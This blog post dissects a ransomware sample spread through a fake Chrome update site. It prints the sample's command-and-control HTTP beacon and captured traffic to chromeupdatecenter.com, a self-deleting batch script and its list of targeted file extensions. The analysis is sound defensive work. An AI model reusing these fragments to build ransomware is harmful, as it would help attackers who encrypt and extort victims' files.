Dissecting a Windows malware

chromeupdatecenter.com Screenshot

Through a friend of my I got to this seemingly fresh malware named GoogleChromeUpdater.exe. The page (URL see at the end of the post) claims to distribute a important Chrome Update. However, the malware encrypt files and left an E-Mail address, the classic file kidnapping along with blackmailing.

Note: If you are infected by this malware your chances are bad to get back your data. The encryption key is likely only stored on the attackers server. Unless somebody breaks the encryption, you cannot restore your data. And of course, you should not feed criminals! 🙂

I could not resist and had to have a closer look at the malware…

I downloaded the malware and loaded it into IDA, where I could get an idea of what it is doing. One function obviously makes a HTTP call back to the site, I found this string inside along with calls to connect, ioctlsocket, send and friends.

GET /%d/%d HTTP/1.1
Host: %s
Accept: text/html
Connection: keep-alive
BroAgent: needle
Disassembled in IDA

Disassembled in IDA

The host will be replaced with chromeupdatecenter.com. I wonder what that request might send you back, but I will come to that later.

Furthermore there is a snippet of a windows batch file, which is likely created to delete the malware itself or other traces:

@echo off
:try
ping -n 5 127.0.0.1
del "%s"
if exist "%s" goto try
del %%0

The ping to localhost is likely a easy method to wait for some seconds, while %s is replaced by the malware name. At the end, the batch file deletes itself.

Furthermore there are calls to FindFirstFile/FindNextFile, which the malware uses to find the files. I found also a list of file endings which are likely affected by the malware:

key, db3, pl, cgi, py, rbw, rb, class, java, pas, vbs, ascx, aspx, jsl, cs, vb, rar, zip, 7z, cfg, conf, css, pl, js, phtm, phtml, php, cert, pem, dtd, xsd, xslt, xsl, xml, inc, asm, idl, resx, rc, inl, hh, hxx, hpp, h, tlh, tli, cc, cxx, cpp, c, dbf, dbc, myd, myi, frm, mysql, sql, pff, st, geo, grs, vrp, erf, epf, cfu, cf, dt, mxl, 1cd, cd, cdx, md, dws, 3ds, ads, dxf, dwf, dwt, dwg, wdp, pdf, accdr, accdt, accde, accdb, mdb, vdp, vdproj, vcp, props, mdp, dsp, vcproj, vcxproj, dbproj, vbproj, vcw, dsw, sln, vdx, vstm, vstx, vssm, vssx, vsdm, vsdx, thmx, sldm, sldx, ppsm, ppsx, ppam, potm, potx, pptm, pptx, ppt, xlam, xlsb, xltm, xltx, xlsm, xlsx, xls, xsl, txt, rtf, odt, dotm, dotx, docm, docx, doc, dib, rle, pdd, eps, raw, pdp, jpe, jpc, j2k, j2c, jp2, jpx, jpf, pxr, vst, icb, vda, tga, tiff, tif, wbmp, wbm, psd, pcd, png, gif, bmp, jpeg, jpg, pam, pfm, pnm, ppm, pgm, pbm, pict, pct,

The domain chromeupdatecenter.com was registred at 23. of January 2014. The registrar is ukrnames.com (Center of Ukrainian Internet Names), the Registrant is a “Alex John”, Scottsdale, United States, which is most likely a fake.

Ok, now its time to run the malware. In created some files in a virtual Windows 7 machine and fired up the malware while having Wireshark running.

After about 20 seconds, the malware started its work. I saw a HTTP connection to chromeupdatecenter.com, along with an answer:

GET /1/1 HTTP/1.1
Host: chromeupdatecenter.com
Accept: text/html
Connection: keep-alive
BroAgent: needle
.HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 22646
Accept-Ranges: bytes
ACC: 22152
Set-Cookie: EID=bd1700b48c6cb93a87f0b7ee761b5fbfe23bf835a2ddffa52ddf98f9b7d340b49ece3dbc9398ef894b737bb180ed4dd0d64245220c11.721
Server: nginx
...

Exactly as expected I got an answer from the server. Interesting here, the Set-Cookie-Header: The EID seems to be some kind of hash, along with an ID (721). Interesting is, that my now encrypted files have exactly that ID appendet, along with an E-Mail address. This is likely an ID in their database, where they stored the key alongside. I’m yet not sure if the EID is the encryption key itself, or if the key is inside the response (note the content length, there is about 20kB binary data inside the response!). Obviously, I should now have all components to try to crack/decrypt the files: The original data, the encrypted data and the key itself. However, my cryptography knowledge is too low, any help appreciated…

Also, the malware places a text file called “AlertEncryptor.txt” in each directory, it contains again my ID along with the E-Mail address and some description how to restore the data. I don’t found that description inside the malware, so this text is part of the response from the server.

Beside that, the downloaded malware is gone. As expected the malware removes itself just after it finished its work. No data were uploaded to the server (except the one HTTP request/response there was no more traffic between the client and the server).

To all windows users out there: Check origin when running executable files from the internet, Microsoft made those messages for reasons 🙂

Origin warning

Origin warning

Leave a Comment


NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>